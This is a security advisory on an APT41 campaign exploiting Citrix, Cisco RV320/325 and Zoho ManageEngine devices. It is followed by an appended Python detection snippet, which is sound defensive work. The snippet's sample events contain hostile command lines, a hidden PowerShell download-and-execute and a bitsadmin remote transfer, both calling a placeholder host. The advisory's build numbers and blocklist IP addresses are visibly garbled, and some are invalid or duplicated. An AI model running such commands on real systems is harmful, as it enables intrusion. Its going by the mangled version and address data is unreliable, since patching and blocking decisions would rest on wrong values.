A malicious group, known as APT41, has an ongoing campaign seeking to exploit vulnerabilities in internet-facing Citrix, Cisco and Zoho ManageEngine devices. Quorum Cyber experts recommend identifying any potentially affected systems and implementing the fixes identified by the vendors. Full guidance and resources are provided in the following sections.
APT41 Global Intrusion Campaign
Yesterday, FireEye produced an article outlining a new campaign by the Chinese actor known as APT41.
The campaign seeks to access devices which are connected via the internet – targeting a wide range of countries and industries, including:
- Countries: Australia, Canada, Denmark, Finland, France, India, Italy, Japan, Malaysia, Mexico, Philippines, Poland, Qatar, Saudi Arabia, Singapore, Sweden, Switzerland, UAE, UK, USA
- Industries: Banking/Finance, Construction, Defence Industrial Base, Government, Healthcare, High Technology, Higher Education, Legal, Manufacturing, Media, Non-profit, Oil & Gas, Petrochemical, Pharmaceutical, Real Estate, Telecommunications, Transportation, Travel, Utility
Quorum Cyber recommends identifying any potentially affected systems and implementing the fixes identified by the vendors.
An external vulnerability scan may also be appropriate to verify these fixes have been properly implemented and to identify any other potential vulnerabilities with internet-facing systems. Further details on each vulnerability and resolution can be found below.
In addition, blocking communications with the IP addresses 220.127.116.11, 18.104.22.168 and 22.214.171.124 would be appropriate. In the following, we provide more detailed insight into each of the targeted vulnerabilities, and the recommended actions for you to secure your systems.
APT41 has been seen communicating via 126.96.36.199 and utilising CVE-2019-19781, a vulnerability in the Citrix Application Delivery Controller, Citrix Gateway and Citrix SD-WAN WANOP appliances. A wide range of Citrix appliances are affected; if exploited, the vulnerability allows an unauthenticated attacker to execute arbitrary code.
The exploit affects the following supported Citrix products:
- Citrix ADC and Citrix Gateway version 13.0 all supported builds before 188.8.131.52
- NetScaler ADC and NetScaler Gateway version 12.1 all supported builds before 184.108.40.206
- NetScaler ADC and NetScaler Gateway version 12.0 all supported builds before 220.127.116.11
- NetScaler ADC and NetScaler Gateway version 11.1 all supported builds before 18.104.22.168
- NetScaler ADC and NetScaler Gateway version 10.5 all supported builds before 10.5.70.12
- Citrix SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO all supported software release builds before 10.2.6b and 11.0.3b
Citrix has released both mitigation steps and fixes for the issue. The mitigation steps should be implemented and verified until you are able to apply the fix that resolves the issue. Full details are available via Citrix support.
Details regarding the mitigation can be found at: https://support.citrix.com/article/CTX267679
A fix has also been issued in the form of a build refresh on supported appliances:
Citrix ADC and Citrix Gateway

| Version | Refresh Build | Release Date |
|---|---|---|
| 10.5 | 10.5.70.12 | 24th January 2020 (Released) |
| 11.1 | 22.214.171.124 | 19th January 2020 (Released) |
| 12.0 | 126.96.36.199 | 19th January 2020 (Released) |
| 12.1 | 188.8.131.52 | 23rd January 2020 (Released) |
| 13.0 | 184.108.40.206 | 23rd January 2020 (Released) |

Citrix SD-WAN WANOP

| Release | Citrix ADC Release | Release Date |
|---|---|---|
| 10.2.6b | 220.127.116.115 | 22nd January 2020 (Released) |
| 11.0.3b | 18.104.22.1685 | 22nd January 2020 (Released) |
NB: If your build is already up to date, you need not implement the mitigation steps.
Continuing to use 22.214.171.124 for communication, APT41 has been seen exploiting Cisco Small Business RV320 routers to deliver a payload. The specific exploit utilised is currently unknown.
However, a Metasploit module combining two CVEs appears to replicate similar activity, enabling remote code execution and the download of a specified payload. These CVEs are CVE-2019-1653 and CVE-2019-1652.
The combination of these CVEs affects the following Cisco products:
- Cisco Small Business RV320
- Cisco Small Business RV325
APT41 was observed communicating over 126.96.36.199 and utilising CVE-2020-10189 to perform remote code execution on Zoho ManageEngine Desktop Central devices. APT41 was found to be employing this vulnerability to deliver a payload in two ways. The first variant directly uploaded a Java-based program containing commands to download and execute files via PowerShell. The second variant used the Microsoft BITSAdmin tool to download and install a file obtained from known APT41 infrastructure (188.8.131.52).
Both variations were used to install a trial version of Cobalt Strike BEACON, a paid tool used in penetration testing allowing attackers (or red-teams) to deploy an agent on a victim’s machine.
The Cobalt Strike BEACON tool can grant a range of capabilities such as:
- Command execution;
- Privilege escalation;
- And more.
Using this tool, APT41 connected to a C2 server at the IP address 184.108.40.206. It was noted that a secondary backdoor was often deployed, connecting to an alternative C2 address. This secondary backdoor was found to be a VMProtected Meterpreter downloader used to install BEACON shellcode. The use of a VMProtected binary is another known tactic of the actor.
This exploit affects Zoho ManageEngine Desktop Central prior to version 10.0.474.
Zoho has released a fix for this vulnerability with version 10.0.479. Full details are available via the ManageEngine Site.
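As an added illustration (not part of the original advisory or of any vendor's tooling), the following Python snippet shows detection logic for the two Desktop Central payload-delivery variants described above, run over constructed Windows process-creation events. The file paths, the 203.0.113.10 address and the command lines are assumptions made up for the example, not APT41 indicators.

```python
import re

# Constructed process-creation events (not real telemetry), each given as
# (parent image, child image, command line). The first two mimic the two
# delivery variants described in the advisory; the other two are benign noise.
SAMPLE_EVENTS = [
    # Variant 1: Desktop Central's Java service runs PowerShell to fetch and execute a file.
    (r"C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exe",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell -nop -w hidden -c \"(New-Object Net.WebClient)"
     ".DownloadFile('http://203.0.113.10/x.exe','C:\\Windows\\Temp\\x.exe');"
     " Start-Process C:\\Windows\\Temp\\x.exe\""),
    # Variant 2: the same service runs a batch command that pulls a file with BITSAdmin.
    (r"C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exe",
     r"C:\Windows\System32\cmd.exe",
     "cmd /c bitsadmin /transfer job /download /priority high "
     "http://203.0.113.10/stage.bin C:\\Windows\\Temp\\stage.bin"),
    # Benign: an interactive PowerShell session and a local BITS job listing.
    (r"C:\Windows\explorer.exe",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell Get-ChildItem C:\\Users"),
    (r"C:\Windows\System32\svchost.exe",
     r"C:\Windows\System32\bitsadmin.exe",
     "bitsadmin /list"),
]

URL = re.compile(r"https?://", re.I)
DOWNLOAD_CMDLETS = re.compile(r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|start-bitstransfer", re.I)
SHELLS = {"cmd.exe", "powershell.exe"}

RULES = {
    # BITSAdmin transferring a file from a remote URL (variant 2).
    "bitsadmin_remote_download": lambda parent, child, cmd: (
        "bitsadmin" in cmd.lower() and "/transfer" in cmd.lower() and URL.search(cmd) is not None),
    # PowerShell pulling content from a URL with a download primitive (variant 1).
    "powershell_download_exec": lambda parent, child, cmd: (
        child.lower().endswith("powershell.exe") and URL.search(cmd) is not None
        and DOWNLOAD_CMDLETS.search(cmd) is not None),
    # The Desktop Central Java process spawning a shell at all (both variants).
    # Assumption: the server runs as java.exe under a DesktopCentral install path.
    "desktopcentral_spawns_shell": lambda parent, child, cmd: (
        "desktopcentral" in parent.lower() and parent.lower().endswith("java.exe")
        and child.lower().rsplit("\\", 1)[-1] in SHELLS),
}

def detect(events):
    """Return (event index, rule name) for every rule each event trips."""
    return [(i, name) for i, (parent, child, cmd) in enumerate(events)
            for name, check in RULES.items() if check(parent, child, cmd)]
```

Only the two malicious events trip rules; the interactive PowerShell session and the local `bitsadmin /list` call produce no hits.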